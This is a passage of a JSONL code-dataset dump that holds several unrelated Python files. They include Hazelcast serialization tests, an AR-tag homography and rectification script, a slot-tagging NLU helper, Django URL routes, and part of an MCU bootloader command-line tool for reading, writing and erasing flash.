decode_variable_integer(bytes_data[1:])\n return length, rest\n\n else:\n return data_cls.LENGTH, bytes_data[1:]\n\n def _get_tag_length_value(self, bytes_data: bytes):\n\n tag = self._get_tag(bytes_data)\n length, rest = self._get_length(tag, bytes_data)\n value = rest[:length]\n rest = rest[length:]\n return tag, length, value, rest\n\n def _get_first(self, bytes_data: bytes):\n\n tag, length, value, rest = self._get_tag_length_value(bytes_data)\n\n data_cls = DlmsDataFactory.get_data_class(tag)\n\n data = data_cls(value, length=length)\n\n return data, rest\n\n def encode(self, to_encode):\n raise NotImplemented('Encoding objects to A-XDR is not yet supported.')\n\n\nclass DlmsDataToPythonConverter:\n\n def __init__(self, encoding_conf: typing.List[DlmsData]):\n self.encoding_conf = encoding_conf\n\n def to_python(self):\n out_list = list()\n for item in self.encoding_conf:\n out_list.append(item.value)\n\n return out_list\n\n def to_dlms(self, data: typing.List):\n raise NotImplemented(\n 'Not yet supported to convert python values to DLMS')\n","sub_path":"dlms_cosem/protocol/a_xdr.py","file_name":"a_xdr.py","file_ext":"py","file_size_in_byte":7610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"116191116","text":"import binascii\n\nfrom hazelcast import six\nfrom hazelcast.core import HazelcastJsonValue\nfrom hazelcast.config import SerializationConfig, INTEGER_TYPE\nfrom hazelcast.serialization.data import Data\nfrom hazelcast.serialization.serialization_const import CONSTANT_TYPE_DOUBLE\nfrom hazelcast.serialization.service import SerializationServiceV1\nfrom tests.base import SingleMemberTestCase\nfrom tests.hzrc.ttypes import Lang\n\n\nclass SerializersTestCase(SingleMemberTestCase):\n def setUp(self):\n config = SerializationConfig()\n config.default_integer_type = INTEGER_TYPE.BIG_INT\n self.service = SerializationServiceV1(serialization_config=config)\n\n def tearDown(self):\n self.service.destroy()\n\n def test_none_serializer(self):\n none = None\n data_n = self.service.to_data(none)\n self.assertIsNone(data_n)\n self.assertIsNone(self.service.to_object(Data()))\n\n def test_boolean_serializer(self):\n true = True\n false = False\n data_t = self.service.to_data(true)\n data_f = self.service.to_data(false)\n\n obj_t = self.service.to_object(data_t)\n obj_f = self.service.to_object(data_f)\n self.assertEqual(true, obj_t)\n self.assertEqual(false, obj_f)\n\n def test_char_type_serializer(self):\n buff = bytearray(binascii.unhexlify(\"00000000fffffffb00e7\"))\n data = Data(buff)\n obj = self.service.to_object(data)\n self.assertEqual(six.unichr(0x00e7), obj)\n\n def test_float(self):\n buff = bytearray(binascii.unhexlify(\"00000000fffffff700000000\"))\n data = Data(buff)\n obj = self.service.to_object(data)\n self.assertEqual(0.0, obj)\n\n def test_double(self):\n double = 1.0\n data = self.service.to_data(double)\n obj = self.service.to_object(data)\n self.assertEqual(data.get_type(), CONSTANT_TYPE_DOUBLE)\n self.assertEqual(double, obj)\n\n def test_datetime(self):\n year = 2000\n month = 11\n day = 15\n hour = 23\n minute = 59\n second = 49\n script = \"\"\"\nfrom java.util import Date, Calendar\ncal = Calendar.getInstance()\ncal.set({}, ({}-1), {}, {}, {}, {})\nresult=instance_0.getSerializationService().toBytes(cal.getTime())\n\"\"\".format(year, month, day, hour, minute, second)\n response = self.rc.executeOnController(self.cluster.id, script, Lang.PYTHON)\n data = Data(response.result)\n val = self.service.to_object(data)\n self.assertEqual(year, val.year)\n self.assertEqual(month, val.month)\n self.assertEqual(day, val.day)\n self.assertEqual(hour, val.hour)\n self.assertEqual(minute, val.minute)\n self.assertEqual(second, val.second)\n\n def test_hazelcast_json_vale(self):\n json_value = HazelcastJsonValue('{\"key\": \"value\"}')\n json_data = self.service.to_data(json_value)\n json_deserialized = self.service.to_object(json_data)\n self.assertEqual(json_value.to_string(), json_deserialized.to_string())\n\n def test_big_int_small(self):\n self._big_int_test(12)\n\n def test_big_int_small_neg(self):\n self._big_int_test(-13)\n\n def test_big_int(self):\n self._big_int_test(1234567890123456789012345678901234567890)\n\n def test_big_int_neg(self):\n self._big_int_test(-1234567890123456789012345678901234567890)\n\n def _big_int_test(self, big_int):\n script = \"\"\"from java.math import BigInteger\nresult=instance_0.getSerializationService().toBytes(BigInteger(\"{}\",10))\"\"\".format(big_int)\n response = self.rc.executeOnController(self.cluster.id, script, Lang.PYTHON)\n data = Data(response.result)\n val = self.service.to_object(data)\n data_local = self.service.to_data(big_int)\n \n self.assertEqual(binascii.hexlify(data._buffer), binascii.hexlify(data_local._buffer))\n self.assertEqual(big_int, val)\n","sub_path":"tests/serialization/serializers_test.py","file_name":"serializers_test.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"111021125","text":"import math\r\n\r\nfrom FabricEngine.SceneGraph.Nodes.Rendering import *\r\nfrom FabricEngine.SceneGraph.Nodes.Images import *\r\nfrom FabricEngine.SceneGraph.PySide import *\r\n\r\nfrom FabricEngine.SceneGraph.Nodes.Geometry.PointsImpl import Points\r\n\r\n\r\nSUPPORTED_SAMPLERS = [\"Poisson\", \"Jittered\", \"Grid\", \"Random\"]\r\n\r\nclass Samples(Points):\r\n \"\"\"A specialized cube polygon mesh node\"\"\"\r\n \r\n def __init__(self, scene, **kwargs): \r\n # call the baseclass constructor\r\n super(Samples, self).__init__(scene, **kwargs)\r\n\r\n dgNode = self.getGeometryDGNode()\r\n dgNode.addMember('distribution', 'Integer', 0)\r\n dgNode.addMember('numSamples', 'Integer', 512)\r\n dgNode.addMember('seed', 'Size', 0)\r\n\r\n self.addMemberParameter(dgNode, 'distribution', True, uiCombo=[{'label': key, 'value': value} for value, key in enumerate(SUPPORTED_SAMPLERS)])\r\n self.addMemberParameter(dgNode, 'numSamples', True, uiRange=Vec2(1, 2048))\r\n self.addMemberParameter(dgNode, 'seed', True, uiRange=Vec2(0, 50))\r\n\r\n self.bindDGOperator(dgNode.bindings,\r\n name = 'SamplesGenerate', \r\n fileName = FabricEngine.SceneGraph.buildAbsolutePath('SamplesGenerate.kl'), \r\n layout = [\r\n 'self.points',\r\n 'self.distribution',\r\n 'self.numSamples',\r\n 'self.seed'\r\n ],\r\n )\r\n\r\nSamples.registerNodeClass('Samples')\r\n\r\nclass SamplerApp(SceneGraphApplication):\r\n \r\n def __init__(self):\r\n\r\n os.environ[\"FABRIC_EXTS_PATH\"] = \"/Library/FabricEngine/1.12.0/Exts:/Users/alexanderwilkie/dev/fabric/Exts:/Users/alexanderwilkie/dev/fabric/Samplers\"\r\n \r\n super(SamplerApp, self).__init__()\r\n\r\n width = 512\r\n height = 512\r\n\r\n self.setWindowTitle(\"Scene Graph Sampler Browser\")\r\n self.resize(width*2, height)\r\n self.setupViewports(useBackgroundTexture=False)\r\n self.setupCamera(cameraPosition=Vec3(0.001, 30, 0), cameraNearDistance=0.1, cameraFarDistance=1000.0, setupCameraManipulator=False)\r\n self.setupGrid(gridSize=width)\r\n\r\n scene = self.getScene()\r\n points = Samples(scene)\r\n\r\n xfo = Xfo(tr=Vec3(-width/2.0, 0.0, -height/2.0));\r\n pointsInstance = GeometryInstance(\r\n scene,\r\n geometry=points,\r\n transform=Transform(scene, parentTransform=Transform(scene), localXfo=xfo),\r\n material=Material(scene, xmlFile='FlatPointsMaterial', color=Color(1.0, 0.0, 0.0))\r\n )\r\n\r\n nodesList = {\r\n 'instance': pointsInstance\r\n }\r\n self.getViewport().getInPort('Camera').getConnectedNode().fitInView(nodesList)\r\n self.rotateCamera(degrees=270)\r\n self.addDockWidget(QtCore.Qt.RightDockWidgetArea, SGNodeInspectorDockWidget(node=points)) \r\n\r\n self.constructionCompleted()\r\n\r\n def rotateCamera(self, degrees):\r\n camXfo = self.getViewport().getInPort('Camera').getConnectedNode().getInPort('Transform').getConnectedNode().getParameter('globalXfo')\r\n camXfo.setValue(Xfo(camXfo.getValue().tr, Quat().setFromAxisAndAngle(Vec3(0.0, 1.0, 0.0), math.radians(degrees))))\r\n\r\nif __name__ == '__main__':\r\n app = SamplerApp()\r\n app.exec_()\r\n","sub_path":"Viewer.py","file_name":"Viewer.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"434543574","text":"from enum import Enum\nimport numpy as np\n\nfrom bof_slot_tagger.slot_tagger import InferModel\n\n\nclass Bof_Nlu:\n def __init__(self):\n self.entities = {\n '<area>': None,\n '<food>': None,\n '<price>': None\n }\n \n self.num_features = 3\n self.rating = None\n \n self.nlu_model = InferModel()\n \n self.EntType = Enum('Entity Type', '<area> <food> <price> <non_ent>')\n\n def init_entities(self):\n self.entities = {\n '<area>': None,\n '<food>': None,\n '<price>': None\n }\n\n def ent_type(self, ent):\n if ent == 'B-area':\n return self.EntType['<area>'].name\n elif ent == 'B-food':\n return self.EntType['<food>'].name\n elif ent == 'B-price':\n return self.EntType['<price>'].name\n else:\n return None\n\n def extract_entities(self, utterance, update=True):\n tokenized = []\n word_list = utterance.split(' ')\n slot_tagging_result = self.nlu_model.inference(utterance)\n \n # print(slot_tagging_result)\n \n for i, tag in enumerate(slot_tagging_result):\n entity = self.ent_type(tag)\n if update and entity:\n self.entities[entity] = word_list[i]\n tokenized.append(entity)\n elif entity:\n tokenized.append(entity)\n else:\n tokenized.append(word_list[i])\n \n return ' '.join(tokenized)\n\n def context_features(self):\n keys = list(set(self.entities.keys()))\n self.ctxt_features = np.array([bool(self.entities[key]) for key in keys],\n dtype=np.float32)\n \n return self.ctxt_features","sub_path":"modules/bof_nlu.py","file_name":"bof_nlu.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"228747210","text":"from django.conf.urls import url\n\nfrom app.views import (\n DefaultFormByFieldView,\n DefaultFormsetView,\n DefaultFormView,\n FormHorizontalView,\n FormInlineView,\n FormWithFilesView,\n HomePageView,\n MiscView,\n PaginationView,\n)\n\nurlpatterns = [\n url(r\"^$\", HomePageView.as_view(), name=\"home\"),\n url(r\"^formset$\", DefaultFormsetView.as_view(), name=\"formset_default\"),\n url(r\"^form$\", DefaultFormView.as_view(), name=\"form_default\"),\n url(r\"^form_by_field$\", DefaultFormByFieldView.as_view(), name=\"form_by_field\"),\n url(r\"^form_horizontal$\", FormHorizontalView.as_view(), name=\"form_horizontal\"),\n url(r\"^form_inline$\", FormInlineView.as_view(), name=\"form_inline\"),\n url(r\"^form_with_files$\", FormWithFilesView.as_view(), name=\"form_with_files\"),\n url(r\"^pagination$\", PaginationView.as_view(), name=\"pagination\"),\n url(r\"^misc$\", MiscView.as_view(), name=\"misc\"),\n]\n","sub_path":"example/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"114094654","text":"import cv2 as cv2\nimport numpy as np\nfrom scipy.spatial import Delaunay\nimport matplotlib.pyplot as plt\n\ndef rectify(img_gray, corners):\n\n desired_corners = np.array([[0,0],[128, 0], [128, 128] ,[0, 128]], dtype=np.float32)\n H = find_svd(corners, desired_corners)\n shape = [128, 128]\n rect_img = getPerspectiveTransform(img_gray,H, shape)\n \n return rect_img\n\ndef warp_lena(img, img_lena, corners):\n\n desired_corners = np.array([[0,0],[img_lena.shape[0], 0], [img_lena.shape[0], img_lena.shape[0]] ,[0, img_lena.shape[0]]], dtype=np.float32)\n H = find_svd(corners, desired_corners)\n shape = [img_lena.shape[0],img_lena.shape[0]]\n warped_img = getPerspectiveTransform_Lena(img,img_lena, H, shape)\n return warped_img\n\ndef find_cube_pts(img, reqdPts, corners, shape, calib):\n\n desired_corners = np.array([[0, 0],[0, shape[1]],[shape[0], shape[1]], [shape[0], 0]])\n H = find_svd(corners, desired_corners)\n H = np.linalg.inv(H)\n H = H/H[2,2]\n E = np.zeros([3, 4])\n calib_inv = np.linalg.inv(calib)\n E_ = np.matmul(calib_inv, H)\n lamda = (np.linalg.norm(np.matmul(calib_inv, H[:, 0])) + np.linalg.norm(np.matmul(calib_inv, H[:, 1])))/2\n B = np.linalg.det(E_)\n \n if B < 0:\n E_ = -E_\n\n E_ = E_/lamda\n E[:,0] = (E_[:,0]/lamda).T\n E[:,1] = (E_[:,1]/lamda).T\n E[:,2] = (np.cross(E[:,0], E[:,1])*lamda).T\n E[:,3] = (E_[:,2]/lamda).T\n E = E[:]/E[2,3]\n imgPts = np.matmul(calib,np.matmul(E,reqdPts.T))\n \n return imgPts\n\n\ndef find_svd(c1,c2):\n\n [x1,y1],[x2,y2],[x3,y3],[x4,y4] = c2\n [xp1, yp1], [xp2, yp2], [xp3, yp3], [xp4, yp4] = c1\n A = np.array([[-x1,-y1,-1,0,0,0,x1*xp1,y1*xp1,xp1],[0,0,0,-x1,-y1,-1,x1*yp1,y1*yp1,yp1],[-x2,-y2,-1,0,0,0,x2*xp2,y2*xp2,xp2],\\\n [0,0,0,-x2,-y2,-1,x2*yp2,y2*yp2,yp2],[-x3,-y3,-1,0,0,0,x3*xp3,y3*xp3,xp3],[0,0,0,-x3,-y3,-1,x3*yp3,y3*yp3,yp3],\\\n [-x4,-y4,-1,0,0,0,x4*xp4,y4*xp4,xp4],[0,0,0,-x4,-y4,-1,x4*yp4,y4*yp4,yp4]], dtype=np.float32)\n \n A_trans = A.transpose()\n A_prod = np.dot(A_trans,A)\n w,v = np.linalg.eig(A_prod)\n H = v[:,-1]\n H = np.reshape(H,(3,3))\n H = H/H[2,2]\n if abs(np.linalg.det(H)) < 0.0001:\n return H \n H = np.linalg.inv(H)\n H = H/H[2,2]\n return H\n\ndef getPerspectiveTransform(img, H, shape):\n\n Hinv = np.linalg.inv(H)\n Hinv = Hinv/Hinv[2,2]\n rect_img = np.zeros((shape[0], shape[1], 1))\n img_ = img.astype(np.float32)\n counter=0\n for i in range(shape[0]): # x? to change\n for j in range(shape[1]): #y?\n [x, y, z] = np.dot(Hinv, np.transpose([j, i, 1]))\n x = x/z\n y = y/z\n counter+=1\n if (type(x) != np.float64) or (type(y)!= np.float64):\n # print(1)\n continue\n if (x < 1919 and y < 1079 and x >= 0 and y >= 0):\n rect_img[i,j] = (img_[int(np.floor(y)),int(np.floor(x))] + img_[int(np.floor(y)),int(np.ceil(x))]\n + img_[int(np.ceil(y)), int(np.ceil(x))]+ img_[int(np.ceil(y)) , int(np.floor(x))])/4.0\n \n return rect_img\n\ndef getPerspectiveTransform_Lena(img, img_lena, H, shape):\n\n Hinv = np.linalg.inv(H)\n Hinv = Hinv/Hinv[2,2]\n img_ = np.zeros((img.shape[0], img.shape[1], 4))\n img_[:,:,0:3] = img\n \n for i in range(shape[0]): # x? to change\n for j in range(shape[1]): #y?\n [x, y, z] = np.dot(Hinv, np.transpose([j, i, 1]))\n x = x/z\n y = y/z\n #print(x, y)\n index_x = [int(np.floor(y)), int(np.floor(y)), int(np.ceil(y)), int(np.ceil(y))]\n index_y = [int(np.floor(x)), int(np.floor(x)), int(np.ceil(x)), int(np.ceil(x))]\n if(x < 1920 and y < 1080 and x>=0 and y>=0):\n img_[int(np.floor(y)), int(np.floor(x)), 0:3] = (img_[int(np.floor(y)), int(np.floor(x)), 0:3]*img_[int(np.floor(y)), int(np.floor(x)), 3] \n + img_lena[i,j,0:3])/(img_[int(np.floor(y)), int(np.floor(x)), 3] + 1)\n img_[int(np.floor(y)), int(np.floor(x)), 3] += 1\n \n return img_[:,:,0:3].astype(np.uint8) \n \ndef orient_img(img):\n\n scale = 5\n scaleEnd = -3\n num_rot = 0\n img_ = np.asarray(img[scale:scaleEnd, scale:scaleEnd]).astype(np.int32)\n inds = np.where(img_>= np.max(img_) - 15)\n xmin = np.min(inds[0])+scale\n xmax = np.max(inds[0])+scale\n ymin = np.min(inds[1])+scale\n ymax = np.max(inds[1])+scale\n topLeft = [xmin, ymin]\n topRight = [xmin, ymax]\n bottomLeft = [xmax, ymin]\n bottomRight = [xmax, ymax]\n keypts = np.array([np.add(bottomRight, 0.1*np.add(topLeft, np.multiply(-1,bottomRight))), np.add(topRight,0.1*np.add(bottomLeft,np.multiply(-1,topRight))) ,\n np.add(topLeft,0.1*np.add(bottomRight,np.multiply(-1,topLeft))),np.add(bottomLeft, 0.1*np.add(topRight, np.multiply(-1,bottomLeft))) ])\n for i in range(len(keypts)):\n if img[int(keypts[i,0])][int(keypts[i,1])] >=230 :\n for k in range(i):\n img = cv2.rotate(img, cv2.ROTATE_90_CLOCKWISE)\n num_rot = i \n\n return num_rot, img \n \n\ndef find_id(img):\n\n sizex = img.shape[0]\n sizey = img.shape[1]\n scale = 5\n scaleEnd = -3\n img_ = np.asarray(img[scale:scaleEnd, scale:scaleEnd]).astype(np.int32)\n inds = np.where(img_>= np.max(img_) - 15)\n xmin = np.min(inds[0])+scale\n xmax = np.max(inds[0])+scale\n ymin = np.min(inds[1])+scale\n ymax = np.max(inds[1])+scale\n topLeft = [xmin, ymin]\n topRight = [xmin, ymax]\n bottomLeft = [xmax, ymin]\n bottomRight = [xmax, ymax]\n keypts = np.array([np.add(bottomLeft, 0.375*np.add(topRight, np.multiply(-1,bottomLeft))),np.add(bottomRight, 0.375*np.add(topLeft, np.multiply(-1,bottomRight))), \n np.add(topRight,0.375*np.add(bottomLeft,np.multiply(-1,topRight))),np.add(topLeft,0.375*np.add(bottomRight,np.multiply(-1,topLeft)))])\n id = 0\n cv2.rectangle(img,(ymin,xmin),(ymax,xmax),(0,255,0),thickness=1)\n for i in range(len(keypts)):\n if(img[int(keypts[i][0])][int(keypts[i][1])] >245):\n id = (id << 1) | int('00000001', 2)\n else:\n id = (id << 1) | int('00000000', 2)\n return id\n\ndef draw_cubes(img, corners, imgPts):\n \n for i in range(corners.shape[0]): \n cv2.line(img, tuple(corners[i%4]),tuple(corners[(i+1)%4]),(0,255,255),3)\n cv2.line(img, tuple(imgPts[0:2, i%4].astype(np.int32)),tuple(imgPts[0:2, (i+1)%4].astype(np.int32)),(0,255,255),3)\n cv2.line(img, tuple(corners[i%4]),tuple([int(imgPts[0,i%4]),int(imgPts[1,i%4])]),(255,0,0),3) \n\ndef in_hull(p, hull):\n\n if not isinstance(hull,Delaunay):\n hull = Delaunay(hull)\n res = hull.find_simplex(p)>=0\n # print(res)\n return res\n \nif __name__==\"__main__\":\n \n index = [44, 250, 399]\n corners = [\n np.array([[1145, 567], [1074, 598], [1033, 537], [1104, 508]], dtype=np.float32),\n np.array([[1099, 625], [1037, 642], [1004, 582], [1067, 566]], dtype=np.float32),\n np.array([[1158, 540], [1134, 597], [1057, 558], [1086, 498]], dtype=np.float32)\n ]\n\n for i in range(len(index)):\n img = cv2.imread(\"VideoFrames/vid\"+ str(index[i])+\".jpg\")\n imgCorner = corners[i]\n rect_img = rectify(img, imgCorner)\n cv2.imshow(\"rectified image\", rect_img)\n oriented_image = orient_img(rect_img)\n cv2.imshow(\"oriented image\", oriented_image)\n id = find_id(oriented_image)\n print (id)\n cv2.waitKey(0)\n ","sub_path":"rectify.py","file_name":"rectify.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"607116402","text":"import sys\nimport argparse\nimport re as _re\nimport logging\n\nfrom . import mboot\nfrom .tool import check_method_arg_number, convert_arg_to_int, check_key, check_int, hexdump, read_file\nfrom .enums import PropertyTag\nfrom .constant import Interface\nfrom .memorytool import MemoryBlock\nfrom .peripheral import parse_peripheral\nfrom .exception import McuBootGenericError\nfrom . import global_error_handler\nfrom . import __version__\n\n# Use when debugging the argprase library, because the command has not been received \n# at this time to set the log level, so there will be no more detailed details.\n# logging.basicConfig(level=logging.DEBUG)\n\ndef parse_args(parser, subparsers, command=None):\n if command is None:\n command = sys.argv[1:]\n # Divide argv by commands\n split_argv = [[]]\n\n if '-o' in command or '--origin' in command: # origin interface\n split_argv[-1].extend(command)\n else:\n for c in command:\n if c in subparsers.choices:\n split_argv.append([c])\n else:\n split_argv[-1].append(c)\n # print(split_argv[-1])\n # If you only enter the tool name, it will output its help by default.\n if split_argv == [[]]:\n split_argv[0].append(\"-h\")\n # Initialize namespace\n args = argparse.Namespace()\n # Set command name, such as cmd1, cmd2..\n for c in subparsers.choices:\n setattr(args, c, None)\n # Parse each command\n parser.parse_args(split_argv[0], namespace=args) # Without command\n # print(args)\n # print(split_argv)\n for argv in split_argv[1:]: # Each Subcommands\n n = argparse.Namespace()\n setattr(args, argv[0], n)\n # print(args)\n # Prevents the addition of commands defined by the parent parser\n parser._parse_known_args(list(argv), namespace=n)\n return args\n\ndef info(mb, memory_id=0, exconf=None):\n nfo = mb.get_mcu_info()\n # Print MCUBoot MCU Info\n for key, value in nfo.items():\n m = \" {}:\".format(key)\n if isinstance(value, list):\n m += \"\".join([\"\\n - {}\".format(s) for s in value])\n else:\n m += \"\\n = {}\".format(value)\n print(m)\n\n if memory_id:\n if exconf:\n mb.setup_external_memory(memory_id, exconf)\n info = mb.get_exmemory_info(memory_id)\n for key, value in info.items():\n m = \" {}:\".format(key)\n if isinstance(value, list):\n m += \"\".join([\"\\n - {}\".format(s) for s in value])\n else:\n m += \"\\n = {}\".format(value)\n print(m)\n\ndef write(mb, address, filename, memory_id=0, offset=0, no_erase=False, exconf=None):\n do_erase = not no_erase\n mb.get_memory_range()\n data, start_address = read_file(filename, address)\n length = len(data) - offset\n data = data[offset:]\n block = MemoryBlock(start_address, None, length)\n if memory_id:\n if exconf:\n mb.setup_external_memory(memory_id, exconf)\n # Some device do not support EXTERNAL_MEMORY_ATTRIBUTES Property, so external memory will not check memory range\n\n if do_erase:\n mb.flash_erase_region(start_address, length, memory_id)\n else:\n if mb.is_in_flash(block):\n if do_erase: # erase first if block in the flash area\n mb.flash_erase_region(block.start, block.length)\n elif mb.is_in_memory(block):\n pass\n else:\n raise McuBootGenericError('MemoryRangeInvalid, please check the address range.')\n start = mb.get_property(PropertyTag.RAM_START_ADDRESS)\n mb.write_memory(start_address, data, memory_id)\n\ndef read(mb, address, length, filename=None, memory_id=0, compress=False, exconf=None):\n mb.get_memory_range()\n block = MemoryBlock(address, None, length)\n if memory_id:\n if exconf:\n mb.setup_external_memory(memory_id, exconf)\n # Some device do not support EXTERNAL_MEMORY_ATTRIBUTES Property, so external memory will not check memory range\n else:\n if not (mb.is_in_flash(block) or mb.is_in_memory(block)):\n raise McuBootGenericError('MemoryRangeInvalid, please check the address range.')\n data = mb.read_memory(address, length, filename, memory_id)\n print('\\n', hexdump(data, address, compress))\n\n# def handle_exception(func):\n# def decorate(func):\n# try:\n# func()\n# except McuBootGenericError as e:\n# err_msg = '\\n' + traceback.format_exc() if ctx.obj['DEBUG'] else ' ERROR: {}'.format(str(e))\n\ndef fill(mb, address, byte_count, pattern, unit, no_erase=False):\n do_erase = not no_erase\n mb.get_memory_range()\n block = MemoryBlock(address, None, byte_count*8)\n if mb.is_in_flash(block):\n if do_erase:\n mb.flash_erase_region(block.start, block.length)\n elif mb.is_in_memory(block):\n pass\n else:\n raise McuBootGenericError('MemoryRangeInvalid, please check the address range.')\n mb.fill_memory(address, byte_count, pattern, unit)\n\ndef erase(mb, address, length, memory_id=0, erase_all = False, exconf=None):\n if memory_id and exconf:\n mb.setup_external_memory(memory_id, exconf)\n if erase_all:\n # Get available commands\n commands = mb.get_property(mboot.PropertyTag.AVAILABLE_COMMANDS)\n # Call KBoot flash erase all function\n if mboot.is_command_available(mboot.CommandTag.FLASH_ERASE_ALL_UNSECURE, commands) and memory_id == 0:\n mb.flash_erase_all_unsecure()\n elif mboot.is_command_available(mboot.CommandTag.FLASH_ERASE_ALL, commands):\n mb.flash_erase_all(memory_id)\n else:\n raise McuBootGenericError('Not Supported \"flash_erase_all_unsecure/flash_erase_all\" Command')\n else:\n # Call KBoot flash erase region function\n mb.flash_erase_region(address, length, memory_id)\n\ndef unlock(mb, key=None):\n if key is None:\n # Call KBoot flash erase all and unsecure function\n mb.flash_erase_all_unsecure()\n else:\n # Call KBoot flash security disable function\n mb.flash_security_disable(key)\n\nclass MBootHelpFormatter(argparse.ArgumentDefaultsHelpFormatter):\n def __init__(self, prog, *args, **kwargs):\n super(MBootHelpFormatter, self).__init__(prog, max_help_position=35, width=85, *args, **kwargs)\n\n def add_usage(self, usage, actions, groups, prefix=None):\n if prefix is None:\n prefix = 'Usage: '\n return super(MBootHelpFormatter, self).add_usage(\n usage, actions, groups, prefix)\n\n def _format_args(self, action, default_metavar):\n get_metavar = self._metavar_formatter(action, default_metavar)\n if action.nargs is None:\n result = '%s' % get_metavar(1)\n elif action.nargs == argparse.OPTIONAL:\n result = '[%s]' % get_metavar(1)\n elif action.nargs == argparse.ZERO_OR_MORE:\n if action.metavar is None:\n # result = '[%s [%s ...]]' % get_metavar(2)\n # When metavar is not set, use '...' for usage\n result = '...'\n else:\n if isinstance(action.metavar, str):\n metavar_len = 1\n else:\n metavar_len = len(action.metavar)\n if metavar_len == 1:\n result = '[%s]' % get_metavar(1)\n elif metavar_len > 1:\n f_string = ' [%s]' * (metavar_len - 1)\n f_string = '[%s{}]'.format(f_string)\n result = f_string % get_metavar(metavar_len)\n else:\n raise ValueError('The \"metavar\" attribute cannot provide an empty tuple.')\n elif action.nargs == argparse.ONE_OR_MORE:\n if action.metavar is None:\n # When metavar is not set, use default value for usage\n result = '[%s [%s ...]]' % get_metavar(2)\n else:\n if isinstance(action.metavar, str):\n metavar_len = 1\n else:\n metavar_len = len(action.metavar)\n if metavar_len == 1:\n result = '[%s]' % get_metavar(1)\n elif metavar_len > 1:\n f_string = ' [%s]' * (metavar_len - 1)\n f_string = '[%s{}]'.format(f_string)\n result = f_string % get_metavar(metavar_len)\n else:\n raise ValueError('The \"metavar\" attribute cannot provide an empty tuple.')\n elif action.nargs == argparse.REMAINDER:\n result = '...'\n elif action.nargs == argparse.PARSER:\n result = '%s ...' % get_metavar(1)\n else:\n formats = ['%s' for _ in range(action.nargs)]\n result = ' '.join(formats) % get_metavar(action.nargs)\n return result\n\n # Abbreviate shorthand help\n def _format_action_invocation(self, action):\n if not action.option_strings:\n default = self._get_default_metavar_for_positional(action)\n metavar, = self._metavar_formatter(action, default)(1)\n return metavar\n\n else:\n parts = []\n\n # if the Optional doesn't take a value, format is:\n # -s, --long\n if action.nargs == 0:\n parts.extend(action.option_strings)\n\n # if the Optional takes a value, format is:\n # -s ARGS, --long ARGS\n else:\n default = self._get_default_metavar_for_optional(action)\n args_string = self._format_args(action, default)\n parts.extend(action.option_strings[:-1])\n parts.append('%s %s' % (action.option_strings[-1], args_string))\n # for option_string in action.option_strings:\n # parts.append('%s %s' % (option_string, args_string))\n\n return ', '.join(parts)\n\nclass MBootSubHelpFormatter(MBootHelpFormatter):\n def _format_usage(self, usage, actions, groups, prefix):\n if prefix is None:\n prefix = _('usage: ')\n\n # if usage is specified, use that\n if usage is not None:\n usage = usage % dict(prog=self._prog)\n\n # if no optionals or positionals are available, usage is just prog\n elif usage is None and not actions:\n usage = '%(prog)s' % dict(prog=self._prog)\n\n # if optionals and positionals are available, calculate usage\n elif usage is None:\n prog = '%(prog)s' % dict(prog=self._prog)\n\n # split optionals from positionals\n optionals = []\n positionals = []\n for action in actions:\n if action.option_strings:\n optionals.append(action)\n else:\n positionals.append(action)\n\n # build full usage string\n format = self._format_actions_usage\n # action_usage = format(optionals + positionals, groups)\n # usage = ' '.join([s for s in [prog, action_usage] if s])\n\n # break usage into wrappable parts\n part_regexp = (\n r'\\(.*?\\)+(?=\\s|$)|'\n r'\\[.*?\\]+(?=\\s|$)|'\n r'\\S+'\n )\n opt_usage = format(optionals, groups)\n pos_usage = format(positionals, groups)\n opt_parts = _re.findall(part_regexp, opt_usage)\n pos_parts = _re.findall(part_regexp, pos_usage)\n assert ' '.join(opt_parts) == opt_usage\n assert ' '.join(pos_parts) == pos_usage\n usage = ' '.join([v for v in [prog, pos_usage, opt_usage] if v])\n\n # wrap the usage parts if it's too long\n text_width = self._width - self._current_indent\n if len(prefix) + len(usage) > text_width:\n # helper for wrapping lines\n def get_lines(parts, indent, prefix=None):\n lines = []\n line = []\n if prefix is not None:\n line_len = len(prefix) - 1\n else:\n line_len = len(indent) - 1\n for part in parts:\n if line_len + 1 + len(part) > text_width and line:\n lines.append(indent + ' '.join(line))\n line = []\n line_len = len(indent) - 1\n line.append(part)\n line_len += len(part) + 1\n if line:\n lines.append(indent + ' '.join(line))\n if prefix is not None:\n lines[0] = lines[0][len(indent):]\n return lines\n\n # if prog is short, follow it with optionals or positionals\n if len(prefix) + len(prog) <= 0.75 * text_width:\n indent = ' ' * (len(prefix) + len(prog) + 1)\n if pos_parts and opt_parts:\n lines = get_lines([prog] + pos_parts, indent, prefix)\n lines.extend(get_lines(opt_parts, indent))\n elif opt_parts:\n lines = get_lines(opt_parts, indent, prefix)\n elif pos_parts:\n lines = get_lines(pos_parts, indent, prefix)\n else:\n lines = [prog]\n\n # if prog is long, put it on its own line\n else:\n indent = ' ' * len(prefix)\n parts = pos_parts + opt_parts\n lines = get_lines(parts, indent)\n if len(lines) > 1:\n lines = []\n lines.extend(get_lines(pos_parts, indent))\n lines.extend(get_lines(opt_parts, indent))\n lines = [prog] + lines\n # join lines into usage\n usage = '\\n'.join(lines)\n\n # prefix with 'usage:'\n return '%s%s\\n\\n' % (prefix, usage)\n\nclass FixArgValue(argparse.Action):\n \"\"\"Fix incorrect allocation of values ​​due to resolution reasons\n :param check_arg: The name of the arg. to be checked, its type must be different from the current arg.\n \"\"\"\n def __init__(self,\n option_strings,\n dest,\n nargs=None,\n const=None,\n default=None,\n type=None,\n choices=None,\n required=False,\n help=None,\n metavar=None,\n check_arg=None): # Add 'check_arg' arg\n argparse.Action.__init__(self,\n option_strings=option_strings,\n dest=dest,\n nargs=nargs,\n const=const,\n default=default,\n 